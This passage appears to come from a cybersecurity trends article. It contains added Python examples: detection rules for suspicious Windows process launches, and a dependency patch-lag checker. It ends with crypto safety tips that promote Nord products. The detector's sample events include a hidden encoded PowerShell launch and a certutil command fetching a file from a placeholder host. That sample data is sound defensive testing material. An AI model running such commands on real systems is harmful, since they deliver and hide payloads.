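     lambda e: e.parent.lower() in OFFICE and e.image.lower() in SCRIPT_HOSTS),
    ("powershell_hidden_encoded",
     lambda e: e.image.lower() == "powershell.exe"
               and re.search(r"(?i)-w(indowstyle)?\s+hidden", e.cmdline) is not None
               and re.search(r"(?i)-e(ncodedcommand|nc)?\s+\S", e.cmdline) is not None),
    ("certutil_remote_fetch",
     lambda e: e.image.lower() == "certutil.exe"
               and re.search(r"(?i)-urlcache\b.*https?://", e.cmdline) is not None),
]

def evaluate(events):
    """Return (host, image, rule) triples for every event that matches a rule."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((e.host, e.image, name))
    return hits

# Constructed events; the first two are ordinary admin use and must not fire.
SAMPLE = [
    ProcEvent("ws-01", "explorer.exe", "powershell.exe", "powershell.exe -NoProfile Get-Service"),
    ProcEvent("ws-01", "explorer.exe", "certutil.exe", "certutil.exe -store My"),
    ProcEvent("ws-02", "WINWORD.EXE", "powershell.exe", "powershell.exe -w hidden -enc QUFBQQ=="),
    ProcEvent("ws-03", "cmd.exe", "certutil.exe",
              "certutil.exe -urlcache -f http://example.invalid/x.bin x.bin"),
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE):
        print(hit)
```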
• Zero-day vulnerabilities pose a significant but transient risk to corporate cyber security. A vulnerability is a zero day when it has been discovered but no fix is available for the issue. During the window between the initial exploitation of a vulnerability and the vendor’s release of a patch for it, cybercriminals can exploit the vulnerability unchecked. However, even after a patch is available, it is not always promptly applied by businesses. Some cyber attack campaigns target vulnerabilities that have been known and “fixed” for months or years. Various reasons exist for these delays, including resource availability, security visibility, and prioritization.
• One area where zero-day attacks and unpatched vulnerabilities are especially concerning is the software supply chain. Often, companies lack full visibility into the third-party, open-source code that their applications use. If these external libraries contain unpatched vulnerabilities, cybercriminals can leverage them to attack the organization. Additionally, widely-used vulnerable libraries create potential attack vectors against multiple organizations.
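An added example (not part of the course or of any real tool) of the visibility these two points call for: a pinned-manifest parser checked against a constructed advisory feed, reporting dependencies still on an affected version together with how long a fix has been available, or that the issue is still a zero day with no fix. Package names, advisory IDs and dates are placeholders.

```python
from datetime import date

# Constructed manifest in requirements.txt style; every dependency must be pinned.
MANIFEST = """\
# payments-api dependencies (constructed sample)
httpclient==2.25.0
parserkit==6.0.1
webframe==2.0.1
"""

# Constructed advisory feed with placeholder IDs; a real feed would be OSV or NVD.
# fixed_in=None means no patched release exists yet (a zero day for its users).
ADVISORIES = [
    {"id": "ADV-0001", "package": "httpclient", "fixed_in": "2.31.0", "fix_date": date(2023, 5, 22)},
    {"id": "ADV-0002", "package": "parserkit", "fixed_in": "5.4", "fix_date": date(2021, 1, 19)},
    {"id": "ADV-0003", "package": "webframe", "fixed_in": None, "fix_date": None},
    {"id": "ADV-0004", "package": "unusedlib", "fixed_in": "1.2", "fix_date": date(2022, 3, 3)},
]

def parse_version(text):
    """Dotted numeric versions only (no PEP 440 pre-release handling)."""
    return tuple(int(p) for p in text.strip().split("."))

def parse_manifest(text):
    """Map package name -> version tuple; unpinned lines cannot be assessed."""
    deps = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        name, sep, ver = line.partition("==")
        if not sep:
            raise ValueError(f"unpinned dependency cannot be assessed: {line}")
        deps[name.strip().lower()] = parse_version(ver)
    return deps

def assess(deps, advisories, today):
    """Findings for installed versions below the fixed version, or with no fix at all."""
    findings = []
    for adv in advisories:
        installed = deps.get(adv["package"])
        if installed is None:
            continue  # advisory for a package this application does not ship
        if adv["fixed_in"] is None:
            findings.append({"package": adv["package"], "advisory": adv["id"], "patch_lag_days": None})
        elif installed < parse_version(adv["fixed_in"]):
            lag = (today - adv["fix_date"]).days
            findings.append({"package": adv["package"], "advisory": adv["id"], "patch_lag_days": lag})
    # No-fix items first (compensating controls needed), then the longest patch lag.
    return sorted(findings, key=lambda f: (f["patch_lag_days"] is not None, -(f["patch_lag_days"] or 0)))
```

Run against the sample on 2023-09-01 it reports webframe (no fix) ahead of httpclient, whose fix has been available for 102 days.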
• Cybercrime is a problem that is rapidly growing on a global scale. In Q3 2022, global cyber attacks increased by 28% compared to the same quarter in 2021. Going into 2023, this trend is only likely to continue. A mature corporate cyber security program needs to be capable of defending against threats originating from all around the world. This includes comprehensive threat protection, round-the-clock monitoring, and access to up-to-date threat intelligence.
Security Consolidation
• Cyber security is growing increasingly complex as IT infrastructures expand and cyber threat actors develop and deploy new attack techniques. As a result, companies need an expanding suite of security capabilities to protect themselves against advanced attacks.
• However, attempting to implement these capabilities via standalone, specialized solutions can actually harm corporate cyber security by making it more difficult to monitor, configure, and operate an organization’s security infrastructure.
• Security consolidation — in which an organization deploys a single security platform with all of the required security capabilities — improves the efficiency and effectiveness of the organization’s security architecture and team, enhancing its threat management capabilities.
• Many corporate cyber security strategies are detection-focused. Once an active threat has been identified, the organization’s security solutions and personnel take action to mitigate or remediate the ongoing attack. However, a responsive approach to security means that the attacker has a window between launching their attack and its eventual remediation to take malicious actions. During this window, the cyber threat actor can cause harm to the organization and expand and entrench their foothold, making remediation more difficult and expensive.
• Instead of focusing on detection, security should have a prevention focus. By identifying and blocking inbound attacks before they reach an organization’s systems, a company eliminates the potential threat, damage, and cost to the organization.
• The evolution of corporate IT architectures has provided cybercriminals with numerous potential avenues of attack against an organization.
• Cloud adoption, remote work, mobile devices, and the Internet of Things (IoT) are only a few examples of new technologies that have introduced new security risks.
• Cyber threat actors can identify and exploit a wide range of vulnerabilities to gain access to corporate systems.
• An effective cyber security program is one that provides comprehensive coverage and protection for all potential attack vectors.
• The future of crypto currency is uncertain. Mainstream adoption is still far off, and intense market volatility is discouraging individuals and companies from getting involved. Public awareness around crypto currency and block chain technology has grown rapidly over the last five years, but much of the publicity centers around scandals, scams, and market crashes.
• The recent collapse of FTX, a major crypto exchange, was a reminder to everyone in the market that even companies considered to be secure and mainstream can fall apart in a matter of hours. The subsequent revelation that FTX may have been hacked, with millions of dollars of crypto potentially lost, underlined the general feeling of chaos and uncertainty in the digital currency market.
• Many crypto enthusiasts insist that these problems are temporary. In the long run, they see digital currency and the block chain as foundational elements in a freer, more decentralized version of the internet. They also insist that a block chain network can serve non-crypto-related purposes, and that’s true: smart contracts, data storage, and the storage of NFTs are all viable block chain functions.
• For now, however, the technology’s primary use case remains crypto currency, for better or for worse. If you’re going to keep using crypto currency yourself, it’s important to protect yourself from the risks that come with it.
• Protect your keys. Whoever holds your cryptographic keys can gain access to your funds. It’s essential that you keep these numerical passcodes private, so if you’re going to store your keys somewhere, protect them with encryption. For example, use an encrypted storage service like NordLocker to keep all your sensitive data, including cryptographic keys, shielded from prying eyes. If you have an account with a crypto exchange, make sure to use multi-factor authentication and a password manager, like NordPass.
• Don’t keep all your funds in a hot wallet. Hot wallets are convenient, but they’re also much more vulnerable to hacking than cold alternatives. Anything that is connected to the internet is vulnerable to hacking. Whenever possible, keep your coins in cold wallets.
• Research a crypto currency exchange before using it. Crypto exchanges play a major role in the crypto economy, but if you’re going to use one, it’s essential that you do your research. Who runs the crypto exchange? Have they been involved in other projects in the past? You don’t want to trust your funds to a company that may not handle them securely. The same logic should apply to any service you trust with funds: if you’re using a cross-chain bridge protocol, for example, research it in advance.
• Limit the threat of malware. Hackers can install malware on your device and use it to monitor your activity, log your keystrokes, and raid your crypto currency. To protect yourself, be extremely wary of unexpected emails that contain links or attachments, even if the sender seems legitimate. You can also use NordVPN’s Threat Protection feature, which prevents you from accessing websites known for malware installation.